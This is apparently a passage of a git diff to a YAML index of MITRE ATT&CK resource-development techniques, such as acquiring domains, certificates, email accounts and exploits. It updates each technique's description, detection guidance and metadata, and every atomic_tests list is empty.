+ Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). + + After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control. id: attack-pattern--1cec9319-743b-4840-bb65-431547bce82a type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:18:08.422Z' + modified: '2021-04-15T02:33:38.589Z' created: '2020-10-01T01:42:24.974Z' - x_mitre_data_sources: - - SSL/TLS certificates x_mitre_detection: |- Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE 
@@ -50544,33 +53353,48 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Digital Certificates description: |- - Before compromising a victim, adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. + Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. - Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. 
Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) + Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ) - Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. + After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control. 
id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:18:54.959Z' + modified: '2021-04-15T02:32:49.507Z' created: '2020-10-01T02:14:18.044Z' - x_mitre_data_sources: - - SSL/TLS certificates x_mitre_detection: |- Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE atomic_tests: [] T1583.001: technique: + created: '2020-09-30T17:09:31.878Z' + modified: '2021-04-15T02:50:38.792Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3 + description: |- + Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. 
+ + Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) + + Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) + name: Domains + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1583.001 
@@ -50599,37 +53423,18 @@ resource-development: description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. source_name: Mandiant APT1 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domains - description: |- - Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. - - Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) - - Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. 
Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) - id: attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-20T20:25:29.310Z' - created: '2020-09-30T17:09:31.878Z' - x_mitre_contributors: - - Wes Hurd - - Vinayak Wadhwa, Lucideus - - Deloitte Threat Library Team - x_mitre_data_sources: - - Domain registration + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: |- Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE + x_mitre_contributors: + - Wes Hurd + - Vinayak Wadhwa, Lucideus + - Deloitte Threat Library Team atomic_tests: [] T1584.001: technique: 
@@ -50651,7 +53456,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Domains description: |- - Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. + Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) id: attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba 
@@ -50659,7 +53464,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-19T01:28:56.664Z' + modified: '2021-04-15T03:02:43.030Z' created: '2020-10-01T00:51:28.513Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50670,6 +53475,54 @@ resource-development: x_mitre_platforms: - PRE atomic_tests: [] + T1608.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.004 + url: https://attack.mitre.org/techniques/T1608/004 + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: Gallagher 2015 + description: Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking + group hacked 100+ websites to use as “watering holes”. Retrieved January + 25, 2016. + url: http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Drive-by Target + description: |- + Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). 
Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). + + Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) + + Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. + + Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). 
+ id: attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-27T17:52:55.302Z' + created: '2021-03-17T20:33:20.127Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on other phases of the adversary lifecycle, such as + [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation + for Client Execution](https://attack.mitre.org/techniques/T1203). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] T1585.002: technique: external_references: 
@@ -50689,7 +53542,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Email Accounts description: |- - Before compromising a victim, adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) + Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) id: attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a 
@@ -50697,7 +53550,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-14T00:48:47.515Z' + modified: '2021-04-15T03:09:59.862Z' created: '2020-10-01T01:09:53.217Z' x_mitre_detection: 'Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50723,7 +53576,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Email Accounts description: |- - Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). + Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. 
@@ -50733,7 +53586,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-20T16:40:58.761Z' + modified: '2021-04-15T02:57:25.544Z' created: '2020-10-01T01:20:53.104Z' x_mitre_detection: 'Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection 
@@ -50767,9 +53620,9 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Establish Accounts description: |- - Before compromising a victim, adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) - For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + For operations incorporating social engineering, the utilization of an online persona may be important. 
These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) id: attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8 
@@ -50777,21 +53630,36 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:20:40.675Z' + modified: '2021-04-15T03:10:35.877Z' created: '2020-10-01T01:05:42.216Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_detection: |- Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - PRE atomic_tests: [] T1587.004: technique: + created: '2020-10-01T01:48:15.511Z' + modified: '2021-04-15T03:07:53.803Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2 + description: |- + Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. 
As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017) + + As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit. + + Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). + name: Exploits + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1587.004 
@@ -50805,23 +53673,10 @@ resource-development: url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Exploits - description: |- - Before compromising a victim, adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017) - - As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit. - - Adversaries may use exploits during various phases of the adversary lifecycle (i.e. 
[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). - id: attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-19T03:09:34.771Z' - created: '2020-10-01T01:48:15.511Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. @@ -50832,10 +53687,6 @@ resource-development: [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1588.005: technique: 
@@ -50870,7 +53721,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Exploits description: |- - Before compromising a victim, adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying) + Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying) In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel) @@ -50882,7 +53733,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-18T21:47:09.385Z' + modified: '2021-04-15T03:14:01.255Z' created: '2020-10-01T02:17:46.086Z' x_mitre_detection: |2- 
@@ -50892,8 +53743,139 @@ resource-development: x_mitre_platforms: - PRE atomic_tests: [] + T1608.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.003 + url: https://attack.mitre.org/techniques/T1608/003 + - source_name: DigiCert Install SSL Cert + url: https://www.digicert.com/kb/ssl-certificate-installation.htm + description: DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved + April 19, 2021. + - source_name: Splunk Kovar Certificates 2017 + url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html + description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL + Certificates. Retrieved October 16, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Install Digital Certificate + description: "Adversaries may install SSL/TLS certificates that can be used + during targeting. SSL/TLS certificates are files that can be installed on + servers to enable secure communications between systems. Digital certificates + include information about the key, information about its owner's identity, + and the digital signature of an entity that has verified the certificate's + contents are correct. If the signature is valid, and the person examining + the certificate trusts the signer, then they know they can use that key to + communicate securely with its owner. 
Certificates can be uploaded to a server, + then the server can be configured to use the certificate to enable encrypted + communication with it.(Citation: DigiCert Install SSL Cert)\n\nAdversaries + may install SSL/TLS certificates that can be used to further their operations, + such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) + with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending + credibility to a credential harvesting site. Installation of digital certificates + may take place for a number of server types, including web servers and email + servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) + or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). + Digital certificates can then be installed on adversary controlled infrastructure + that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) + or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))." + id: attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-26T18:43:18.448Z' + created: '2021-03-17T20:32:13.793Z' + x_mitre_detection: |- + Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) + + Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). 
+ x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1608.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.005 + url: https://attack.mitre.org/techniques/T1608/005 + - source_name: Malwarebytes Silent Librarian October 2020 + url: https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ + description: Malwarebytes Threat Intelligence Team. (2020, October 14). Silent + Librarian APT right on schedule for 20/21 academic year. Retrieved February + 3, 2021. + - source_name: Proofpoint TA407 September 2019 + url: https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian + description: 'Proofpoint Threat Insight Team. (2019, September 5). Threat + Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Link Target + description: "Adversaries may put in place resources that are referenced by + a link that can be used during targeting. An adversary may rely upon a user + clicking a malicious link in order to divulge information (including credentials) + or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). + Links can be used for spearphishing, such as sending an email accompanied + by social engineering text to coax the user to actively click or copy and + paste a URL into a browser. Prior to a phish for information (as in [Spearphishing + Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial + access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), + an adversary must set up the resources for a link target for the spearphishing + link. 
